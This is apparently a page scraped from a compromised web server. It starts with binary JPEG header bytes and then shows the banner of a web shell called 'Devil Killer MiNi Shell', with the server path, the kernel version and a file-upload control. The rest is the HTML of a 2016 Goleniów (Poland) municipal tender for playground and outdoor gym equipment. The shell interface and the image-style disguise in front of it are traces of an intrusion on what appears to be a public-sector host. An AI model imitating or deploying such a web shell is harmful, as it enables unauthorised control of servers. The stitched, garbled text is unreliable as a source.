JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160414/40705-N-2016.html

<p class="kh_header"><b>Goleniów: Dostawa i montaż urządzeń zabawowych na terenie Gminy Goleniów</b><br>
<b>Numer ogłoszenia: 40705 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Goleniów , Plac Lotników 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4698200, faks 091 4698298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goleniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń zabawowych na terenie Gminy Goleniów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i montaż urządzeń zabawowych na terenie Gminy Goleniów. 
2. Zamawiający dokonał podziału zamówienia na 3 części.
3.2.1. Wykonawca może złożyć ofertę na jedną, lub więcej części
Zakres przedmiotu zamówienia do wykonania obejmuje:

3.3.1. Część nr 1 - Dostawa i montaż urządzeń zabawowych na terenie Gminy Goleniów
3.3.1.1. Część nr 1 obejmuje:
a) Roboty ziemne. Przygotowanie terenu pod urządzenia zabawowe w miejscowości Białuń,   Borzysławiec, Budno, Burowo, Czarna Łąka, Imno,   Kliniska Wielkie,   Krępsko,   Łaniewo, Miękowo, Modrzewie, Mosty Osiedle, Pucice,   Święta,   Załom.
b) Wyposażenie placów zabaw - dostarczenie i montaż urządzeń zabawowych z wykonaniem fundamentów, w tym urządzenia:
-	Zestaw zabawowy metalowy - 1 szt.,
-	Huśtawka dwustanowiskowa metalowa - 6 szt.,
-	Zestaw zabawowy drewniany - 1 szt.,
-	Wieża ze ślizgawką - 1 szt.,
-	Siedzisko kubełkowe - 2 szt.,
-	Siedzisko płaskie - 1 szt.,
-	Huśtawka ważka - 5 szt.,
-	Bujak na sprężynie - 1 szt.,
-	Bujak na sprężynie koniczynka - 2 szt.,
-	Karuzela - 1 szt.,
-	Samochód - 1 szt.,
-	Zestaw gimnastyczny - 1 szt.,
-	Kółko i krzyżyk - 1 szt.,
-	Regulamin placu zabaw - 1 szt.,
-	Poręcze podwójne - 2 szt.,
-	Prasa nożna - 1 szt.,
-	Biegacz - 1 szt.,
-	Wyciąg górny - 1 szt.,
-	Twister - 2 szt.,
-	Drabinka do podciągania - 1 szt.,
-	Orbitrek - 5 szt.,
-	Wyciskanie siedząc - 1 szt.,
-	Wahadło - 1 szt.
-	Ławki- 10 szt.
-	Kosze- 2 szt.


3.1.1.3. Zamawiający żąda aby wszystkie urządzenia posiadały certyfikaty bezpieczeństwa - zgodności z grupą norm PN-EN 1176.

3.1.1.4. Wykonawca ma obowiązek wykonania nawierzchni bezpiecznej  z piasku płukanego pod wszystkie urządzenia zabawowe ( nie dotyczy urządzeń siłowni zewnętrznej).Grubość warstwy bezpiecznej powinna być dostosowana do każdego z urządzeń zgodnie z obowiązującymi normami.
3.3.2. Część nr 2 - Dostawa i montaż urządzeń zabawowych i sportowych dla miejscowości Miękowo 

3.3.2.1. Część nr 2 obejmuje:
a) Przedmiot zamówienia obejmuje dostarczenie i montaż:
-	Karuzeli tarczowej z dwoma siedziskami - 1 szt
-	Orbitrek + pylon + biegacz (2 w1)- 1 szt (Urządzenia mogą być montowane razem lub osobno)
-	Wyciąg górny+ pylon + wyciskanie siedząc( 2w1) - 1 szt (Urządzenia mogą być montowane razem lub osobno)

3.1.2.3. Zamawiający żąda aby wszystkie urządzenia posiadały certyfikaty bezpieczeństwa - zgodności z grupą norm PN-EN 1176.

3.1.2.4. Wykonawca ma obowiązek wykonania nawierzchni bezpiecznej  z piasku płukanego pod karuzelę. Grubość warstwy bezpiecznej powinna być dostosowana do urządzenia zgodnie z obowiązującymi normami.



3.3.3. Część nr 3 -  Dostawa i montaż urządzeń sportowych dla miejscowości Białuń

3.3.3.1. Przedmiot zamówienia obejmuje dostawę i montaż:
-	Wyciąg górny+ pylon + wyciskanie siedząc (2w1) - Urządzenia mogą być montowane       razem lub osobno)
-	Orbitrek - 1szt
-	Jeździec - 1 szt
-	Wahadło, biegacz, twister  ( 3w1) - Urządzenia mogą być montowane razem lub osobno
-	Rower - 1 szt.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych w wysokości nie przekraczającej:

a)	na część 1 - 20% wartości zamówienia podstawowego. Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.
b)	na część 2 - 20% wartości zamówienia podstawowego. Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.
c)	na część 3 - 20% wartości zamówienia podstawowego. Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Celem spełnienia warunku zawartego art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż dysponuje: 

 Dla części nr 1

a)	w zakresie wiedzy i doświadczenia co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż  urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.




W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.

Dla części nr 2

a)	w zakresie wiedzy i doświadczenia co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż  urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.

W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.

 Dla części nr 3

a)	w zakresie wiedzy i doświadczenia co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż  urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.

W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.

 Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a)	dla części nr 1 - Zamawiający określa, że obowiązek wykazania przez Wykonawcę                w wykazie (zał. nr 5.1 do SIWZ) i złożenie poświadczeń, dotyczy co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.

W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.

Wykaz należy przygotować zgodnie z załącznikiem nr 5.1. do SIWZ dla części nr 1.
(W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz.)  

a)	dla części nr 2 - Zamawiający określa, że obowiązek wykazania przez Wykonawcę w wykazie (zał. nr 5.2 do SIWZ) i złożenie poświadczeń, dotyczy co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż  urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.

W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.

Wykaz należy przygotować zgodnie z załącznikiem nr 5.2. do SIWZ dla części nr 2.
(W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz.)  

a)	dla części nr 3 - Zamawiający określa, że obowiązek wykazania przez Wykonawcę w wykazie (zał. nr 5.3 do SIWZ) i złożenie poświadczeń, dotyczy co najmniej dwie dostawy z montażem o charakterze odpowiadającym przedmiotowi zamówienia tzn. obejmującą swoim zakresem dwie dostawy i montaż  urządzeń zabawowych i/lub sportowych na kwotę 50.000,00 zł łącznie z podatkiem VAT,

Wykonawca nie może sumować ilości kilku dostaw o mniejszym zakresie dla uzyskania wymaganej ilości porównywalnej dla jednej dostawy.

W przypadku  składania ofert na więcej niż jedną część zamówienia, Wykonawca wykazując spełnienie warunków udziału w postępowaniu może wykazać te same dostawy przy założeniu, że spełniają one warunki określone przez Zamawiającego dla poszczególnej części.
Wykaz należy przygotować zgodnie z załącznikiem nr 5.3. do SIWZ dla części nr 
(W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz.);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy przygotowany dla zamówienia będący  odpowiednim załącznikiem dla danej części, na którą Wykonawca składa ofertę  tj.:
-   załącznik nr 1.1. do SIWZ dla części nr 1 
-   załącznik nr 1.2. do SIWZ dla części nr 2
-   załącznik nr 1.3. do SIWZ dla części nr 3

                       
2.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - przygotowane zgodnie z odpowiednim załącznikiem dla danej części, na którą Wykonawca składa ofertę  tj.: 
-   załącznik nr 2.1. do SIWZ dla części nr 1 
-   załącznik nr 2.2. do SIWZ dla części nr 2
-   załącznik nr 2.3. do SIWZ dla części nr 3




                      

3.	   jeżeli Wykonawca ma zamiar zlecić wykonanie części zamówienia podwykonawcy to musi wypełnić i załączyć do oferty odpowiedni załączniki dla danej części, na którą Wykonawca składa ofertę (jeżeli dotyczy) tj.: 

-   załącznik nr 6.1. do SIWZ dla części nr 1 
-   załącznik nr 6.2. do SIWZ dla części nr 2
-   załącznik nr 6.3. do SIWZ dla części nr 3


4.	pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca                   w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.

Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów                  w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, żąda złożenia                 w ofercie stosownych dowodów w zakresie niezbędnym do udowodnienia, iż wykonawca dysponuje zasobami niezbędnymi dla należytego wykonania danego zamówienia,                              w zależności od okoliczności przypadku, z którego korzysta wykonawca. Dowodami tymi mogą być  dokumenty dotyczące w szczególności: 


a) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia

Wykonawca celem udowodnienia faktycznego, czynnego korzystania z zasobów innych podmiotów w szczególności może przedstawić w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zawierające odpowiednio do okoliczności przypadku, z którego korzysta wykonawca informacje określone w powyższych podpunktach od a) do d).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
a)	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
            w szczególności wstrzymanie dostawy przez Zamawiającego, 
b)	Zmiana miejsca dostawy, 
c)	Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia dostaw, 
d)	Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; 
e)	Zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę, 
f)	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy 
g)	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów, pok.212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 11:45, miejsce: Urząd Gminy i Miasta, Plac Lotników 1, 72-100 Goleniów, pok.212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż urządzeń zabawowych na terenie Gminy Goleniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 obejmuje:

a) Roboty ziemne. Przygotowanie terenu pod urządzenia zabawowe w miejscowości Białuń,   Borzysławiec, Budno, Burowo, Czarna Łąka, Imno,   Kliniska Wielkie,   Krępsko,   Łaniewo, Miękowo, Modrzewie, Mosty Osiedle, Pucice,   Święta,   Załom.
b) Wyposażenie placów zabaw - dostarczenie i montaż urządzeń zabawowych z wykonaniem fundamentów, w tym urządzenia:
-	Zestaw zabawowy metalowy - 1 szt.,
-	Huśtawka dwustanowiskowa metalowa - 6 szt.,
-	Zestaw zabawowy drewniany - 1 szt.,
-	Wieża ze ślizgawką - 1 szt.,
-	Siedzisko kubełkowe - 2 szt.,
-	Siedzisko płaskie - 1 szt.,
-	Huśtawka ważka - 5 szt.,
-	Bujak na sprężynie - 1 szt.,
-	Bujak na sprężynie koniczynka - 2 szt.,
-	Karuzela - 1 szt.,
-	Samochód - 1 szt.,
-	Zestaw gimnastyczny - 1 szt.,
-	Kółko i krzyżyk - 1 szt.,
-	Regulamin placu zabaw - 1 szt.,
-	Poręcze podwójne - 2 szt.,
-	Prasa nożna - 1 szt.,
-	Biegacz - 1 szt.,
-	Wyciąg górny - 1 szt.,
-	Twister - 2 szt.,
-	Drabinka do podciągania - 1 szt.,
-	Orbitrek - 5 szt.,
-	Wyciskanie siedząc - 1 szt.,
-	Wahadło - 1 szt.
-	Ławki- 10 szt.
-	Kosze- 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3.</p></li>
